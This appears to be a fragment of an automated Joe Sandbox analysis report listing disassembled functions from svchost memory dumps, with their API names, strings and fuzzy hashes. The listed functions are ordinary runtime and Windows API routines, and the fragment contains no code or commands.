                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: E7F08930B18BA091FA054B93B9541955330E749FD4F088132DD9E07B58DE2CC4898300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction ID: d7e82976dfde1dc4d4d4de19e26bad0ed23d16972c276b0e218568bba0d9a431
                                            • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                            • Instruction Fuzzy Hash: 1AF0AE3030CBA091FB028B97B94529563B0F748FD8F084132DD5E07F18CE2CC5598300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction ID: 73b6b03aab83e1f99a9798063c3f49f6cbb5a15b6ebe00f4a351a76d1d355aef
                                            • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction Fuzzy Hash: 2EF08271B29A54A1FF864FA0E8A43E52370EF49B88F04241B954F46360EF38C4DCCB10
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction ID: 0c04b921a9b410b6f166b68d2e862303f23bc6912795505d241f09e58222c7b8
                                            • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                            • Instruction Fuzzy Hash: 14F01271319B5491FF574FA0F8843E923B0AB58B98F44201B994F46964DF6CC59CC700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction ID: 0468c56e32e5ecdb93a49922f01a9dced457731f4c5f6c1fead8d90b8d7d76dc
                                            • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction Fuzzy Hash: 5902A93662DB9086E761CB59E49439AB7B1F3C5798F104116EACE87BA8DF7CC448CB40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction ID: a8b803c9f3b0ee84c12c6eec875a5d35ab47494d9e0bfc3170ef25e1641000c8
                                            • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                            • Instruction Fuzzy Hash: 3F02BC3611DB9486EB61CB59E49439AB7B1F3C5798F104116EA8E87B68DFBCC498CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: f04de11a177723f6a12d5930976192a82fc46b7b5d768117d5fc1aa130b5f10a
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: FE81CE32E28A7489FB529B6598A03ED2BB1F746B8CF444517DE4E53B92FB34844EC710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2210144848-0
                                            • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction ID: e9bf900f22b3ca95ac7582406c0d7b3979c2cb72aeca3c50aeed9c95934cee2e
                                            • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                            • Instruction Fuzzy Hash: 1481BC32618A6089FB62AF6598807ED2BF1F794B9CF444117DE4E63F96EB34844DC710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction ID: 5a11ddcfa039438ed463471aaed5abd3b60112fcee3bb98f83115015e23af584
                                            • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction Fuzzy Hash: B961BA3692DB94C6E7618B19E49435AB7B0F389768F100116FACD87BA8DB7CC548CF40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction ID: e7194792c7a7624c00be057d4555403ae848d75e92fe035f4fa726bbfe8f50e2
                                            • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                            • Instruction Fuzzy Hash: B361B77651DB54C6EB619B19E49439AB7F1F388788F100116FA8E87BA8DBBCC548CF40
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: 10caee5077c3ef502bec3471ed2fb945522b50dfd098a07731f745d70388336d
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 2011A332E5EA30C9F69A1168E4763E513716B6737CF044636FA7E067D7EB148C49C100
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: ad0af8ccf25c9a2e923504ff5f7ec24561113f6063c2958b79c18a5040c978d4
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 1511E932E5CE3001F6671165E4923E993707B6F77CF484737AA7F46FD68A188C494101
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: _set_statfp
                                            • String ID:
                                            • API String ID: 1156100317-0
                                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction ID: c0534e1f103526e3930e95b505158ccc66963acafab619b8ed5bfee4d88b7b63
                                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                            • Instruction Fuzzy Hash: 4511A333A5CA3141FA9A1164E4563E913F07B753BCF050626AA7E87FD7AB548D494300
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: 741cd371535e58e4f55e2cdc5e18ad35b61bb847470f44393e0482604e6d7ada
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: 1C113C3AB18B5482FB169F91F4146A9A7B5FB4AB88F04002ADE8D07B94FF3DC548C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: 5ef8119f26d26c6f51f6e64c5e8f526c4b61e41789b728723e7e64dfcb2fb927
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: 7E115E3A708B5083EB169BA5F4047AAA7B0F748B88F04042ADE8D07B94EF3DC51CC700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction ID: 31aee347fee61d2d614974f151fdafca9f87d8d84b0641efe70a5bb4441efe65
                                            • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                            • Instruction Fuzzy Hash: 8051D132B1A220AADB27DF25E445B9837F5F342BDCF518126DA0E87789DB34E849C705
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm$f
                                            • API String ID: 3242871069-629598281
                                            • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction ID: b0723f28f7a0575ea5fdd575e6fa23e0190c7b56bffab0f33ecf9d8e6447e11b
                                            • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                            • Instruction Fuzzy Hash: E131EE72A09660A6E713DF12E885B9937F8F342BDCF158116EE4E07784CB38E949C709
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction ID: 3302e18425058611f86b48afbc7a7a9cc7d1bf90f6bb5665c9e7b62b11099c6e
                                            • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                            • Instruction Fuzzy Hash: E211B236918FA896F752CFA6A81429A7774F78AF88F04401ADB8E03714EF38C095C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction ID: 6365e74ea41314e2c76e16990aea213b6aecc0aa63ce0f0888ada0406651787d
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: C671F432A2C7A185E76ADF6599543EAA7B0F746B8CF440017DE4D57B88DF35CA88C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction ID: 841b4bbb1c2aae61a077ab825e40647a98d0d66a3117e0e7e84a6c4aa514df95
                                            • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                            • Instruction Fuzzy Hash: 2971D2722187A186EB769F6A99443EEA7B1F748B8CF440017DE8D43B89DEB5C60CC740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: 684cc52012bf08a02ea854e3c5e00fd2e482725b670355f3805120c974a84c5f
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: 4651F732A2D7A182E6769E29E1543EA6771F387788F000027CD8E03F99DE35C4898B40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction ID: 6c60b4d3f03c60b87fae5669e464e306287a3577044a8185eb26f4003221b5c7
                                            • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                            • Instruction Fuzzy Hash: E851E93220C7A142E777EF2AE5543EAA7B1F385788F454027DE8E03B99CEB5C4098B40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: b43d16757bf5e9589a98c71ae9370e20613dc249c4dd67caf5abf271398e3e89
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: F841C672B18A9482EB21DF25E4543DAB7B1F789788F404026EE8D87798EF3CC545CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction ID: e59b5f175e4c890c155bae94444f65b5e8e3f628d710972a0f8f93c7c4adde9c
                                            • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                            • Instruction Fuzzy Hash: 2E41A372319A5082EB219F25E4443DAA7B0F788788F504026EE8D87B98DB7CC545CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: 41f5f8c1b6d9781716885eb7728698c86a40eb5a14e32fd4e6294361c62e05b2
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: FC114A36A08B9086DB65CB56F45029AB7B4F7CABC4F54412AEE8D83B59DF38C554CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Stringtry_get_function
                                            • String ID: LCMapStringEx
                                            • API String ID: 2588686239-3893581201
                                            • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction ID: 56865a3138f0fa5c383209f95c9c6dd944c088f6238ac715f738dd5f569e7bca
                                            • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                            • Instruction Fuzzy Hash: A8110636608B9086D761CB56B48069AB7B4F7C9B94F544126EE8E83B59DF38C5588B00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: d9042d3ab88ee03dd59a299df3f7f2bc7607c62d41262829ace1d5b1cd0866a9
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: 8B111F32618B9482EB618F15E44029E77B5F789B98F184222DF8D07764EF3CC555CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction ID: 35dab9fdd70e0aba8154ea3a0721de1dcb63ab0178392f21c6a1abd3b65b2230
                                            • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                            • Instruction Fuzzy Hash: B5111C32618B9082EB668F15F44039977F5F788B98F184222DF8D0BB68DF78C559CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: 97157dce8ab8c9e342e1a495dafd4371ef732dfcfaa4e487683373aa742c3c2c
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: 0BF0A731B287A091FB07AB85F4506D56331EB89BD8F495027EA5D13B54DF38C9ADC700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                            • String ID: InitializeCriticalSectionEx
                                            • API String ID: 539475747-3084827643
                                            • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction ID: 6dbab020d7271c260022a4a82442732b0884924286e54c0759775da47405c1b3
                                            • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                            • Instruction Fuzzy Hash: 46F08231718BA092E707AB91F4406E573B1AB88B98F495027ED5D07F55CE78C9ADC700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: 9711712e3d408104b7a636f22671f09248094bbe1e46c96de628ba518baa1951
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: F5E06D71A1865091FA0A5B90F8247D52332AB897C8F494023DA1D06395EE38C9ADC710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd
                                            Similarity
                                            • API ID: try_get_function
                                            • String ID: November$October
                                            • API String ID: 2742660187-1636048786
                                            • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction ID: d29161db2d5e58e77a19aeec2b0767fee3f9300d5dbd27e93e65991b3153c9da
                                            • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                            • Instruction Fuzzy Hash: C4E09231E0C65292FA179B52F4442E4A3B19B8974CF595123A61D06366CE38C89E8740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Valuetry_get_function
                                            • String ID: FlsSetValue
                                            • API String ID: 738293619-3750699315
                                            • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction ID: 910b5ec2379656de2447d9424a2381c348c3328b520d0130a964aae5f50a12af
                                            • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                            • Instruction Fuzzy Hash: 96E0927120865091FB075BA0F8407E823B2BB88B88F494023D90D06B56CE78C96DC701
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction ID: 33a1b714b105d773c2c5a18b45ff3f86a857af4a48be75d1c83c01d21736f56c
                                            • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                            • Instruction Fuzzy Hash: 01219532A18FA481FB128F59E40429AF3B4FB85B99F454116DE8C47B14FF78C58A8700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
